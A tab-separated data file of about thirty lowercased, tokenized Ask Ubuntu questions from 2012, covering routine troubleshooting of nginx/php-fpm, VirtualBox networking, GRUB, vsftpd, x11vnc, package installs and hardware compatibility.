164627	nginx/php-fpm `` access denied . '' error	i 'm trying to set up a freshly installed ubuntu ( 12.04 ) server , but i ca n't get php files running through php-fpm . no matter what i do , i always get a `` access denied . '' page ( plain text , not html or anything ) . installed packages : nginx nginx-common nginx-full php5 php5-cli php5-common php5-fpm configuration details : php-fpm : user = www-data group = www-data listen = /var/run/php5-fpm.sock nginx : user www-data ; worker_processes 3 ; events { worker_connections 1024 ; } default/test domain : server { listen 80 ; server_name localhost ; root /extra/htdocs/default ; index index.html index.php access_log /extra/logs/default/access.log ; error_log /extra/logs/default/error.log ; location / { try_files $ uri $ uri/ /index.html ; } location ~ \.php { fastcgi_split_path_info ^ ( .+\.php ) ( /.+ ) $ ; include fastcgi_params ; fastcgi_index index.php ; fastcgi_pass unix : /var/run/php5-fpm.sock ; fastcgi_param path_info $ fastcgi_path_info ; fastcgi_param path_translated $ document_root $ fastcgi_path_info ; fastcgi_param script_filename $ document_root $ fastcgi_script_name ; } } /extra/htdocs/default/index.php : < ? php phpinfo ( ) ; everything else is default . both the nginx and php-fpm logs show no errors . yet when i load http : // < server-ip > /index.php i get the `` access denied '' page . troubleshooting : the index.html file works just fine . therefore it must be either php-fpm , or the fastcgi binding between nginx and php-fpm . i 've set the ownership ( both user and group ) of the entire /extra directory to www-data , and ownership to 777 , just to be sure ( i 'll tone it down once it works of course ) . so it 's certainly not a permissions issue it 's not the security.limit_extensions issue that i see a lot : by default that is set to .php , which is exactly what i 'm requesting . i 've explicitly set it to .php .html , with the same result . i 'm really getting tired of this , i 've installed this setup twice already ( albeit on osx machines ) , and everything worked flawlessly . is there anything i 'm overlooking ? the log contents : the nginx error log is empty . nginx access log ( removed ip ) : < ip > - - [ 17/jul/2012:11:21:25 +0200 ] `` get /favicon.ico http/1.1 '' 304 0 `` - '' `` mozilla/5.0 ( macintosh ; intel mac os x 10_7_4 ) applewebkit/536.11 ( khtml , like gecko ) chrome/20.0.1132.57 safari/536.11 '' < ip > - - [ 17/jul/2012:11:21:28 +0200 ] `` get /index.php http/1.1 '' 403 46 `` - '' `` mozilla/5.0 ( macintosh ; intel mac os x 10_7_4 ) applewebkit/536.11 ( khtml , like gecko ) chrome/20.0.1132.57 safari/536.11 '' < ip > - - [ 17/jul/2012:11:21:34 +0200 ] `` - '' 400 0 `` - '' `` - '' php-fpm log : [ 17-jul-2012 10:44:14 ] notice : fpm is running , pid 4969 [ 17-jul-2012 10:44:14 ] notice : ready to handle connections
164630	i try to install 32 bit os , but last two times 64bit os only got loaded ? why ?	and i am using windows os 7 of 32 bit operation . all my windows application are suitable for 32 bit only . example i would like to use ms office excel & word as it is while in ubuntu os . but may be since my application in 32bit and ubuntu in 64bit , i am not able to open it completely . so i would like to use 32bit ubuntu , otherwise 64bit is very fine for me . i use wine application . ( 1 ) is it mandatory to have only 32bit ubuntu for the ms office which i installed in my windows 7 , 32 bit os ? ( 2 ) why even if i choose 32 bit ubuntu installation , it 's always downloading amd64.tar.xz ? regards , saravanakumar t
164632	user management for 10+ ubuntu machines	we have two ubuntu servers and 10 ubuntu client machines . i want to maintain all users from the server something like active directory in windows . is there any gui for maintaining and achieving such ? i have heard ldap can be the backend but , how do i manage everything from one place ? i know about canonical 's landscape , but i am looking more of something which is free of charge .
164634	new to ubuntu problem in accessing internet	i recently moved on from windows 7 to ubuntu 12.04 precise pangolin i love every thing about ubuntu since it was version 5.04 but now when i installed ubuntu 12.04 i am unable to access my internet . i configured my ip address , my net-mask , my gateway , my dns server and i can see that i get up/down arrow mark symbol in my system tray representing working network but i am actually not able to access any website . it works fine for me when i ping my isp 's server i get reply well and good i only fail in getting access to website . things were pretty simple previously but now i am facing this problem . any help in this regard is greatly appreciated .
164635	ubuntu server virtualbox host-only adapter confusion ( windows 7 host )	really hoping this is right place to ask this question seeing that my host is a windows 7 machine . i have 3 ubuntu server 12.04 vms set up through virtualbox 4.1.18 , and envisage the following usage : lamp - for drupal , moodle and other arbitrary php test applications ( additionally a few of the drupal installs need to communicate with some internet services ) ssh - to sftp to the /var/www directory using filezilla from win7 smtp service - for drupal and moodle installs to send test emails out from them . before i continue , i must stress that i 'm not deeply knowledgeable with regard to networking in general , but i did read up on a few things to not make a complete fool of myself here ! i only have a single machine on my physical network - a laptop which connects to my router via wifi and which picks up : dhcp enabled = yes ipv4 = 192.168.1.6 subnet mask = 255.255.255.0 ipv4 default gateway = 192.168.1.254 and currently under nat , virtualbox assigns an ip of 10.0.2.15 to my vm . i started reading the following article ( host-only networking with virtualbox ) which was exactly what i wanted to accomplish , and got a good idea of how to setup nat and host-only adapters for each desired vm . however i then got confused when i read this article ( networking between host and guest vms in virtualbox ) . virtualbox > file > preferences > network > edit host-only adapter , shows me an ipv4 address of 192.168.56.1 and mask of 255.255.255.0 . would the following configuration for /etc/network/interfaces be correct for static ip under the vm : # the host-only network interface auto eth1 iface eth1 inet static address 192.168.56.101 netmask 255.255.255.0 network 192.168.56.0 broadcast 192.168.56.255 i am confused about the second referenced article mentioning that nat will give 10.0.2.15 on eth0 , but then host-only eth1 should be static and set to 10.1.2.1* . from the article : `` each nat adapters and host-only adapter should not reside in same sub-network '' . what should my eth1 interface block above contain ? i am hesitant to try various options in case i end up breaking something , which why i 'm asking here first ... basically , what is the right way to this ? thank you having the patience to read my question . sincerely hope you can help me . tia .
164636	/media folder nearly full - /media/vids folder has 500gb free	weird error . i have a 1tb hddmounted as my main file repository . it is mounted as /media/vids . when i check properties of /media it says 2gb free . when i check properties of /media/vids it says 586gb free . torrent down loader says not enough space to continue downloads to /media/vids . can anyone explain
164637	permission denied moving files	extreme noob here so please point me in the direction for beginners ! i have managed to mount my box.net account following these instructions . however when i copy files and paste them into a file within box i get a permission denied error message . then i try again and it will let me move it . however it keeps happening and is making batch movements impossible . any help would be greatly appreciated .
164639	optimizing ext4 performance	i 'm using my machine to build stuff a lot and there 's a specific directory that gets used very often . i 've got 8gb of ram , which is helpful for the build , but is far from enough to cache the whole folder ( which is around 12gb ) . i 'm wondering . is there a way to optimize the access to this particular folder ? for instance , can the directory structure for this folder be cached in the ram ? can the most used files be cached into the ram as well ? do you know of such a solution for ubuntu ? i 've got ups so i 'm not particularly bothered by power downs .
164647	how to enable iptables tarpit ?	i 'm using ubuntu server 10.04 and i have to enable tarpit module . i installed the followning packet : aptitude install xtables-addons-common xtables-addons-source module-assistant auto-install xtables-addons-source but when i try to add a tarpit rule i get this error : iptables : no chain/target/match by that name . thanks for your help .
164650	unable to installl vnc server	i am running ubuntu 12.04 ( http : //elinux.org/beagleboardubuntu ) on my beagle bone . however i am unable to install vnc server . sudo apt-get install vnc4server package vnc4server is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'vnc4server ' has no installation candidate
164651	how to make grub detect an old os after formatting `/boot` partition	i had set my pc like this : /boot - 250 mb ext3 / 100 gb ext4 , kubuntu now i needed to install ubuntu so i made a new 8 gb partition as / and formatted the previous /boot partition and set that same partition as new /boot for this new installation . the thing is that now my kubuntu partition is like just a /home partition and a few other system folders but without a /boot and grub sees only the new ubuntu installation . please help , all my work for 1.5 years is on kubuntu and i have to get it back . i could go and copy my firefox profile ( cause this is the most important that i have there ) but i would really prefer to have my system back . edit : when i do sudo update-grub it says this : generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-26-generic found initrd image : /boot/initrd.img-3.2.0-26-generic found linux image : /boot/vmlinuz-3.2.0-23-generic found initrd image : /boot/initrd.img-3.2.0-23-generic found memtest86+ image : /memtest86+.bin found ubuntu 12.04 lts ( 12.04 ) on /dev/sda6 done my kubuntu is on /dev/sda6 but when i restart it shows only this options : ubuntu , with linux 3.2.0-26-generic ubuntu , with linux 3.2.0-26-generic ( recovery mode ) previous linux versions ( in here are 3.2.0-23 and 3.2.0-23 recovery mode ) memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) and that 's it , no kubuntu or ubuntu 12.04 lts on /dev/sda6 . in a post someone said that grub.cfg has to be updated manually ( to write the entry for kubuntu in my case ) but it did n't work , may be i did something wrong ... edit2 : i added manually kubuntu in grub.cfg , copied the ubuntu menuentry and with the help of sudo blkid found out the uuid and replaced the ubuntu partition uuid with the kubuntu partition uuid . restarted , it was there , booted but now it shows that : if i press s it continues and boots up all good ... anyone knows how to get rid of the notice ? : )
164652	unable to connect to localhost in browser after installing xampp successfully	i have successfully installed xampp 1.5.3 following this guide on ubuntu 12.04 and it started with no errors . $ sudo /opt/lampp/lampp start starting xampp for linux 1.5.3a ... xampp : starting apache with ssl ( and php5 ) ... xampp : starting mysql ... xampp : starting proftpd ... xampp for linux started . but when i open http : //localhost/ or http : //127.0.0.1/ in firefox i get the unable to connect error . after i turned out to be unsuccessful , i changed the port in httpd.conf as described here from 80 to 81 and attempted to open http : //localhost:81/ and http : //127.0.0.1:81/ , but i got the same result . edit the output of netstat -tlnp : active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 0.0.0.0:3306 0.0.0.0 : * listen 23369/mysqld tcp 0 0 0.0.0.0:21 0.0.0.0 : * listen 23352/proftpd : ( acc tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 20196/dnsmasq tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 929/cupsd tcp6 0 0 : :1:631 : : : * listen 929/cupsd tcp6 0 0 : :1:44166 : : : * listen 23848/java
164654	how to install mysql 5.1 on 12.04 ?	i just installed ubuntu 12.04 at work , which runs very well . unfortunately , for work reasons , i need to use mysql version 5.1 . i ca n't find a clean way of installing it . i must install it the usual way because we have scripts that rely on the ubuntu standard installation paths and directories . i would avoid to downgrade my distro ( and i have no time to do it ) . can you please point out a good way of doing this ?
164656	how do i add the `` gnome-shell-extensions '' ppa ?	when i 'm trying to add any ppa using `` apt '' i get the following error : $ sudo add-apt-repository ppa : gnome-shell-extensions traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 7 , `` could n't connect to host '' ) nevertheless , apt is working fine and i can install/remove/upgrade applications , moreover curl is also ok i 've already checked it ... my internet connection is also fine , i can use any application using internet . i am not behind any proxies or firewalls . everything was working fine before i updated from ubuntu 11.10 to 12.04 . btw : i know i can add an entry manually , but such situation is really annoying . i 've been googling for a long time but with no result : ( any ideas ? thanks : )
164658	miktex equivalent for 12.04 ( open for more suggestions )	i was using miktex in windows 7 . now that i have changed to ubuntu 12.04 , i was looking for a equivalent replacement for it . i tried miktex for debian systems but the following error came : dpkg : error processing /home/venom/download/miktex-tools-2.8_beta_2-1-i386-linux.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : /home/venom/download/miktex-tools-2.8_beta_2-1-i386-linux.deb`
164661	no icons or filesystem in partition while installing ubuntu 12.04	here a picture : and a link : https : //mail-attachment.googleusercontent.com/attachment/ ? ui=2 & ik=4e292ad6a2 & view=att & th=13894b3608347cfe & attid=0.1 & disp=inline & realattid=1407738951781842944-1 & safe=1 & zw & sadnir=1 & saduie=ag9b_p-90ufqvux1y8mlzgbswsyu & sadet=1342528638595 & sads=j5vmqv6wayrs5phno-5pbw0_ku8 what can cause it or how to fix ? happened also after recreating the disk on key of ubuntu desktop 12.04 64 bit also while exiting the icons have appeared suddenly . and after wxiting , i was in the livecd but none of the program i 've installed there was there . may it be a bug ? should tell it in launchbag ? thanks for helping . edit : finally , my way to recognize was trying to reduce every partition , and the one which here minimun of size was bigger than the other-it 's windows ! hope this is helping for you ( :
164667	hide directory of other users on ftp	i have used vsftpd to create ftp server of my ubuntu 12.04 desktop version . i have created too many users on ubuntu desktop.the problem is that..when i access it through ftp client with specific user , its shows all users directories . i want to show only directories that are intended to that user which i have loggedin , i want to hide all other directories . please guide me .
164668	ubuntu one windows publish file - is there a way to get the copy web link feature on windows	i would like to see the right click > web link option like there is on ubuntu . i have windows 7 on my desktop and i would like to keep it , but i wa n't to keep ubuntu one also , is there a way to get the copy web link on windows . i do n't like to go to http : //one.ubuntu.com all the time . greetings , giovanni kosman
164670	how to find out pkg origin ?	i am using ubuntu 12.04 . i want to know how can we find out about a package installation origin . i mean is it installed with apt-get or aptitude or externally or installed with ubuntu . is there any way ?
164673	ubuntu detects that i do n't have at least 4.4 gb free space , what should i do ?	when i try to install ubuntu 12.04 , it shows me , that i do n't have at least 4.4 gb free space . how can i format my hard disk drive ? actually i have 8.4 gb free space , but i screwed up everything and reinstalled ubuntu ( 12.04 ) so many times because it was n't booting fine and now it shows me , that i ca n't install . the problem is that the `` continue '' button is n't available to be clicked .
164674	how to remove gnome-core	i installed gnome-core using sudo apt-get install gnome-core . but now i want to uninstall it and switch over to other desktop environments . does anyone know how to do this and what are the other uis you would recommend . this is for a beaglebone- so a light weight ui would be preferred .
164680	ubuntu 12.04 and chromium full screen issue	i 'm currently running chromium 18.0.1025.168 ( developer build 134367 linux ) on ubuntu 12.04 with dual screens if i change to full screen i ca n't change back . if i drag the mouse to the top of the screen and left click i see small drop down . ( see figure 1 ) when i click f11 the screen attempts to return to normal but then reverts with the same drop down message . any ideas would be appreciated . extra information : the issue does n't affect the other screen running a parallel instance of chromium
164693	will 12.10 's arm edition support raspberry pi ?	i just bought one and would prefer running ubuntu over fedora . ( please do n't close this question again ) . i am also looking for an answer to this . there is nothing wrong with the question format . please do n't be over-eager admins .
164695	why are these errors popping up even when the installation is fine ?	i am having a problem , when i try to install or upgrade something , it appears like it fails , but it does not . this will pop up usually only for the ubuntu software center . this will pop up after installing for upgrading anything . yet the program still works ( well , this one did n't really . but it installed fine for as long as i kept it installed . ) this is n't a big deal since the programs install fine . but the errors are still annoying . update : when i manually , refresh the update manager , an error pops up but it still works . update : when doing an update , this is the error i got installarchives ( ) failed : ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 315343 files and directories currently installed . ) preparing to replace libgstreamer-plugins-base0.10-0 0.10.36-1 ( using ... /libgstreamer-plugins-base0.10-0_0.10.36-1ubuntu0.1_i386.deb ) ... unpacking replacement libgstreamer-plugins-base0.10-0 ... preparing to replace ubuntu-sso-client-gtk 3.0.0-0ubuntu2 ( using ... /ubuntu-sso-client-gtk_3.0.2-0ubuntu1_all.deb ) ... unpacking replacement ubuntu-sso-client-gtk ... preparing to replace ubuntu-sso-client 3.0.0-0ubuntu2 ( using ... /ubuntu-sso-client_3.0.2-0ubuntu1_all.deb ) ... unpacking replacement ubuntu-sso-client ... preparing to replace python-ubuntu-sso-client 3.0.0-0ubuntu2 ( using ... /python-ubuntu-sso-client_3.0.2-0ubuntu1_all.deb ) ... unpacking replacement python-ubuntu-sso-client ... preparing to replace python-problem-report 2.0.1-0ubuntu8 ( using ... /python-problem-report_2.0.1-0ubuntu11_all.deb ) ... unpacking replacement python-problem-report ... preparing to replace python-apport 2.0.1-0ubuntu8 ( using ... /python-apport_2.0.1-0ubuntu11_all.deb ) ... unpacking replacement python-apport ... preparing to replace apport 2.0.1-0ubuntu8 ( using ... /apport_2.0.1-0ubuntu11_all.deb ) ... apport stop/waiting unpacking replacement apport ... preparing to replace apport-gtk 2.0.1-0ubuntu8 ( using ... /apport-gtk_2.0.1-0ubuntu11_all.deb ) ... unpacking replacement apport-gtk ... preparing to replace firefox-globalmenu 13.0.1+build1-0ubuntu0.12.04.1 ( using ... /firefox-globalmenu_14.0.1+build1-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement firefox-globalmenu ... preparing to replace firefox 13.0.1+build1-0ubuntu0.12.04.1 ( using ... /firefox_14.0.1+build1-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement firefox ... preparing to replace firefox-gnome-support 13.0.1+build1-0ubuntu0.12.04.1 ( using ... /firefox-gnome-support_14.0.1+build1-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement firefox-gnome-support ... preparing to replace firefox-locale-en 13.0.1+build1-0ubuntu0.12.04.1 ( using ... /firefox-locale-en_14.0.1+build1-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement firefox-locale-en ... preparing to replace firefox-locale-zh-hans 13.0.1+build1-0ubuntu0.12.04.1 ( using ... /firefox-locale-zh-hans_14.0.1+build1-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement firefox-locale-zh-hans ... preparing to replace gstreamer0.10-alsa 0.10.36-1 ( using ... /gstreamer0.10-alsa_0.10.36-1ubuntu0.1_i386.deb ) ... unpacking replacement gstreamer0.10-alsa ... preparing to replace gstreamer0.10-gnomevfs 0.10.36-1 ( using ... /gstreamer0.10-gnomevfs_0.10.36-1ubuntu0.1_i386.deb ) ... unpacking replacement gstreamer0.10-gnomevfs ... preparing to replace gstreamer0.10-plugins-base 0.10.36-1 ( using ... /gstreamer0.10-plugins-base_0.10.36-1ubuntu0.1_i386.deb ) ... unpacking replacement gstreamer0.10-plugins-base ... preparing to replace gstreamer0.10-plugins-base-apps 0.10.36-1 ( using ... /gstreamer0.10-plugins-base-apps_0.10.36-1ubuntu0.1_i386.deb ) ... unpacking replacement gstreamer0.10-plugins-base-apps ... preparing to replace gstreamer0.10-x 0.10.36-1 ( using ... /gstreamer0.10-x_0.10.36-1ubuntu0.1_i386.deb ) ... unpacking replacement gstreamer0.10-x ... preparing to replace thunderbird-globalmenu 13.0.1+build1-0ubuntu0.12.04.1 ( using ... /thunderbird-globalmenu_14.0+build1-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement thunderbird-globalmenu ... preparing to replace thunderbird 13.0.1+build1-0ubuntu0.12.04.1 ( using ... /thunderbird_14.0+build1-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement thunderbird ... preparing to replace thunderbird-locale-en 1:13.0.1+build1-0ubuntu0.12.04.1 ( using ... /thunderbird-locale-en_1 % % 3a14.0+build1-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement thunderbird-locale-en ... preparing to replace thunderbird-locale-en-us 1:13.0.1+build1-0ubuntu0.12.04.1 ( using ... /thunderbird-locale-en-us_1 % % 3a14.0+build1-0ubuntu0.12.04.1_all.deb ) ... unpacking replacement thunderbird-locale-en-us ... preparing to replace xul-ext-ubufox 2.0.3-0ubuntu1 ( using ... /xul-ext-ubufox_2.1.1-0ubuntu0.12.04.1_all.deb ) ... unpacking replacement xul-ext-ubufox ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for hicolor-icon-theme ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... setting up oracle-java7-installer ( 7u3-0~eugenesan~precise4 ) ... downloading ... -- 2012-07-18 11:03:46 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 63.97.123.18 , 63.97.123.8 connecting to download.oracle.com ( download.oracle.com ) |63.97.123.18|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz [ following ] -- 2012-07-18 11:03:46 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 23.13.178.174 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |23.13.178.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-07-18 11:03:47 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |63.97.123.18|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-i586.tar.gz' 0k ... .. 100 % % 468k=0.01s 2012-07-18 11:03:48 ( 468 kb/s ) - `./jdk-7u3-linux-i586.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already setting up libgstreamer-plugins-base0.10-0 ( 0.10.36-1ubuntu0.1 ) ... setting up python-ubuntu-sso-client ( 3.0.2-0ubuntu1 ) ... setting up ubuntu-sso-client ( 3.0.2-0ubuntu1 ) ... setting up ubuntu-sso-client-gtk ( 3.0.2-0ubuntu1 ) ... setting up python-problem-report ( 2.0.1-0ubuntu11 ) ... setting up python-apport ( 2.0.1-0ubuntu11 ) ... setting up apport ( 2.0.1-0ubuntu11 ) ... apport start/running setting up apport-gtk ( 2.0.1-0ubuntu11 ) ... setting up firefox ( 14.0.1+build1-0ubuntu0.12.04.1 ) ... please restart all running instances of firefox , or you will experience problems . setting up firefox-globalmenu ( 14.0.1+build1-0ubuntu0.12.04.1 ) ... setting up firefox-gnome-support ( 14.0.1+build1-0ubuntu0.12.04.1 ) ... setting up firefox-locale-en ( 14.0.1+build1-0ubuntu0.12.04.1 ) ... setting up firefox-locale-zh-hans ( 14.0.1+build1-0ubuntu0.12.04.1 ) ... setting up gstreamer0.10-alsa ( 0.10.36-1ubuntu0.1 ) ... setting up gstreamer0.10-gnomevfs ( 0.10.36-1ubuntu0.1 ) ... setting up gstreamer0.10-plugins-base ( 0.10.36-1ubuntu0.1 ) ... setting up gstreamer0.10-plugins-base-apps ( 0.10.36-1ubuntu0.1 ) ... setting up gstreamer0.10-x ( 0.10.36-1ubuntu0.1 ) ... setting up thunderbird ( 14.0+build1-0ubuntu0.12.04.1 ) ... installing new version of config file /etc/apport/blacklist.d/thunderbird ... setting up thunderbird-globalmenu ( 14.0+build1-0ubuntu0.12.04.1 ) ... setting up thunderbird-locale-en ( 1:14.0+build1-0ubuntu0.12.04.1 ) ... setting up thunderbird-locale-en-us ( 1:14.0+build1-0ubuntu0.12.04.1 ) ... setting up xul-ext-ubufox ( 2.1.1-0ubuntu0.12.04.1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : oracle-java7-installer error in function : setting up oracle-java7-installer ( 7u3-0~eugenesan~precise4 ) ... downloading ... -- 2012-07-18 11:03:58 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 63.97.123.18 connecting to download.oracle.com ( download.oracle.com ) |63.97.123.18|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz [ following ] -- 2012-07-18 11:03:59 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 23.13.178.174 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |23.13.178.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-07-18 11:03:59 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |63.97.123.18|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-i586.tar.gz' 0k ... .. 100 % % 462k=0.01s 2012-07-18 11:03:59 ( 462 kb/s ) - `./jdk-7u3-linux-i586.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer
164696	ubuntu says i do n't have enough free disk pace , how to install ?	when i try to install ubuntu , everything is fine except this : have at least 4.4 gb free space . and i ca n't install because the `` continue '' button is n't allowed . please help ! : x
164698	installed plex media server , and it wont start	i just installed plex media server via the software center , and when i try to start it i get initctl : unknown job : plexmediaserver how can i fix/debug this issue ?
164703	ca n't mount external hard drive	i have a problem accessing the data on my external hard drive . i recently did a fresh install but mistakenly left my external hard drive plugged in . when i tried to access the data on the external hdd , it says `` no files '' but recognizes that there is 290 gib of data on it . the hdd is 350gb big . i checked the drive with disk utility and it showed that the hard drive had a bootable flag . so , in the edit partition , i unchecked this bootablity . now it wo n't mount in ubuntu and now my xp ca n't recognize it at all , whereas i could access the data on the xp machine before . in disk utility , it does n't give me the option to check the bootable box in again and i ca n't access the data on xp either . any ideas on how to fix it ?
164706	alternative to compiz-annotate for kubuntu	i 'm looking for a way to freehand draw on my desktop so i can take screenshots like the one used in this answer . i have the screenshot tool already setup i just need the annotate functionality without installing compiz . i 'd like to avoid the overhead of a standalone application like shutter or inkscape - unless there 's a very streamlined workflow for quickly : annotating the screen ( could be across 1 or more running applications ) take a screenshot of the area upload the image to public hosting ( imgur ) speed is very important - i do n't want to wait for a program like shutter to launch , edit , draw , upload , close . i 'd rather just draw , select the area and have the url copied to my clipboard automatically .
164712	ssh and x11vnc with multiple users	i have an ubuntu 12.04 workstation at home which i also use when i 'm at work . my girlfriend also uses it when i 'm at work . the arrangement is that i connect through ssh while she is physically working at the machine . i would like to be able to have a remote desktop session on my user without having her log off . so far , i have been able to remotely connect to my workstation using x11vnc and ssh with the following command sudo x11vnc -create -safer -localhost -nopw -once -auth /var/run/lightdm/root/:0 -display :21 i 'm using windows as the client computer with putty and tightvnc . i 've read that i have to start a x server on a specific display before running the x11vnc command . however , every time i do it , i log my girlfriend out of the machine and force the physical display to show what i am doing . is there a way to remotely connect to my workstation and have an x session without logging anybody out ? i 've tried normal x11 forwarding through putty/xming , but it is painfully slow thanks ! edit : in case people have problems with this in the future , i used the guide in the following website : http : //rbgeek.wordpress.com/2012/06/25/how-to-install-vnc-server-on-ubuntu-server-12-04/ i just tested it , and it works great : good speed , vnc over ssh , and nobody gets logged out
164716	is the amd radeon hd7670m compatible with 12.04 ?	i want to buy a new laptop and run ubuntu 12.04 on it . i have my eyes on an hp but i want o make sure if the vga is fully compatible with ubuntu . the vga is amd radeon hd7670m
164717	ubuntu hardware recognition and driver loading - how does it happen ?	after doing some reading about device drivers and .ko files and drivers built into the kernel at compile time i was wondering what happens at boot time . does the boot up process identify hardware and load the appropriate module ( if there is one ) for the hardware during the boot process ( assuming that the driver is not already compiled into the kernel ) ? in the case of .ko files , when they are installed , how does the kernel know to load the module next time the system boots up ? is there some kind of lookup table during the boot process that searches for the .ko file of a new device when installed ?
164721	why wo n't my install on macbook work ?	i am trying to install ubuntu 12.04 on my macbook . the cd drive is broken , so i am going from a usb flash drive i created . i can get it to `` try ubuntu '' perfectly fine , as a matter of fact i 'm using it right now . however , i really want to install . everything is partitioned , refit is installed . i run the installer and i follow the guide at apple intel installation i get to the install part of the installer , and after running it ends with a fatal grub error . anyone know how to get past this ? i feel like it has something to do with the fact that i do n't get the last dialog box of the installer with the `` advanced '' tab used in the guide . any help is greatly appreciated !
164722	internet connection problem	i want to have a dial-up connection in my pc.i want to have a wiered connection.and i am using realtek rtl8168d/8111d family pci-e gigabit ethernet nic ( ndis 6.20 ) . my windows 7 connection info is below : connection-specific dns suffix : zipbd.com description : realtek rtl8168d/8111d family pci-e gigabit ethernet nic ( ndis 6.20 ) physical address : â00-27-0e-02-2d-0f dhcp enabled : yes ipv4 address : 10.25.41.114 ipv4 subnet mask : 255.255.0.0 lease obtained : tuesday , july 17 , 2012 11:18:44 pm lease expires : saturday , august 24 , 2148 6:14:59 am ipv4 default gateway : ipv4 dhcp server : 10.25.0.2 ipv4 dns servers : 10.15.0.10 , 10.15.0.1 , 10.15.0.11 , 203.189.231.93 , 203.189.231.6 , 8.8.8.8 ipv4 wins server : netbios over tcpip enabled : yes link-local ipv6 address : fe80 : :34f5:88c6 : cd06 : cf7b % 12 ipv6 default gateway : fe80 : :28ba:4d85:1b4f : c16f % 12 ipv6 dns server : please help ... .
164725	my desktop disappeared , how do i get it back ?	i have ubuntu 12.04 lts . this morning when i logged into my ubuntu , after login screen the complete desktop was empty , the only operation i could perform is right-click and open terminal . what i 've tried : ctrl+alt+f1 unity -- reset : did n't work from terminal unity -- reset : did n't work and from login screen selecting ubuntu 2d and that also did n't solve the problem . my laptop is toshiba sa-60 onboard ati graphic card with 1 gb ram . please tell me how to solve this problem . i do n't want to reinstall ubuntu as whenever i install a i/o error pops up , forget about that . i do n't want to reinstall ubuntu . please help .
164726	how resilient is ubuntu to repeated `` power-off '' shutdowns ?	my company is considering the use of ubuntu as an os for use on a hardware device . it would be installed on compact flash drive - apparently this is not standard flash drive but a specific type of memory that is supposed to `` cope '' with immediate power shutdown ( i am not sure how this is achieved but they are supposedly a `` high end '' card ) . the units that would be run using ubuntu are the type of units that will not be gracefully shutdown - the power cable would be removed and that is that . can anybody give me some advice on the potential problems that can occur ? is ubuntu a good system that can deal with this kind of power outage and reboot successfully on next startup ? i realise that nothing is unbreakable , but is it a commonly used os for an embedded setup ? is it asking for trouble to use ubuntu in this kind of environment ?
